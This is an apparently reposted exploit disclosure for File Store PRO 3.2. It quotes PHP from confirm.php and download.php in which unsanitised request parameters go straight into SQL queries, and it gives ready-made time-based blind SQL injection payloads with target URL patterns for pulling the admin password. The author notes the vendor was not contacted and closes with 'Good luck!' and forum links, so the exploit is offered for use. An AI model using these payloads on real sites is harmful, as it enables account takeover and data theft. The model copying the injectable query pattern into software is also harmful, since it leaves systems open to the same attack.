File Store PRO 3.2 Multiple Blind SQL Injection Vulnerabilities

    | File Store PRO 3.2 Blind SQL Injection |

    |________________________________________|

    Download from: http://upoint.info/cgi/demo/fs/filestore.zip

    – Need admin rights:

    /confirm.php:

    复制代码

    代码如下:

    if(isset($_GET[“folder”]) && $_GET[“folder”]!=””) {

    $folder=$_GET[“folder”];

    } else {

    exit(“Bad Request”);

    }

    if(isset($_GET[“id”]) && $_GET[“id”]!=””) {

    $id=$_GET[“id”];

    } else {

    exit(“Bad Request”);

    }

    // Validate all inputs

    // Added by SepedaTua on June 01, 2006 – http://www.sepedatua.info/

    /********************** SepedaTua ****************************/

    /* Fields:

    $folder

    $id

    */

    $search = array (‘@<script[^>]*?>.*?</script>@si’,

    ‘@<[\/\!]*?[^<>]*?>@si’,

    ‘@([\r\n])[\s] @’,

    ‘@&(quot|#34);@i’,

    ‘@&(amp|#38);@i’,

    ‘@&(lt|#60);@i’,

    ‘@&(gt|#62);@i’,

    ‘@&(nbsp|#160);@i’,

    ‘@&(iexcl|#161);@i’,

    ‘@&(cent|#162);@i’,

    ‘@&(pound|#163);@i’,

    ‘@&(copy|#169);@i’,

    ‘@&#(\d );@e’);

    $replace = array (”,

    ”,

    ‘\1’,

    ‘”‘,

    ‘&’,

    ‘<‘,

    ‘>’,

    ‘ ‘,

    chr(161),

    chr(162),

    chr(163),

    chr(169),

    ‘chr(\1)’);

    $ffolder = $folder;

    $fid = $id;

    $folder = preg_replace($search, $replace, $folder);

    $id = preg_replace($search, $replace, $id);

    —–

    $SQL=”SELECT `”.DB_PREFIX.”users`.*, `”.DB_PREFIX.”file_list`.`filename`, `”.DB_PREFIX.”file_list`.`descript` “;

    $SQL.=” FROM `”.DB_PREFIX.”file_list` LEFT JOIN `”.DB_PREFIX.”users` ON `”.DB_PREFIX.”file_list`.`user_id`=`”.DB_PREFIX.”users`.`id`”;

    $SQL.=” WHERE `”.DB_PREFIX.”file_list`.`id`='”.$id.”‘”;

    if(!$mysql->query($SQL))

    {

    exit($mysql->error);

    }

    if($mysql->num<=0)

    {

    exit(“Record not found”);

    }

    POC:

    ‘ UNION SELECT IF (SUBSTRING(password, 1, 1)=’a’, BENCHMARK(100000000, ENCODE(‘a’,’b’)), 1 ),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 from fstore_users where login=’admin

    Site: http://site.xxx/confirm.php?folder=a&id=[SQL]

    – Don’t need admin rights:

    In /download.php:

    复制代码

    代码如下:

    if(!isset($_GET[“sig”])) // direct download, no need to login

    $MustLogin=1|2|4;

    require_once(“libs/header.php”);

    if(!isset($_GET[“sig”])) // direct download, no need to login

    $userlevel=$CurUser->getlevel();

    $SQL=”SELECT * FROM `”.DB_PREFIX.”file_list` WHERE `id`='”.$fileid.”‘”;

    if(!$mysql->query($SQL))

    {

    exit($mysql->error);

    }

    POC:

    ‘ UNION SELECT IF (SUBSTRING(password, 1, 1)=’a’, BENCHMARK(100000000, ENCODE(‘a’,’b’)), 1 ),2,3,4,5,6,7,8,9,10,11 from fstore_users where login=’admin

    Site:

    http://site.xxx/download.php?id=[SQL]

    Needs magic_quotes_gpc=off. Vendor not contacted !

    ——————————————————————–

    Site: http://rstcenter.com

    Site: http://de-ce.net

    Good luck !

    ——————————————————————–

发表评论

发表评论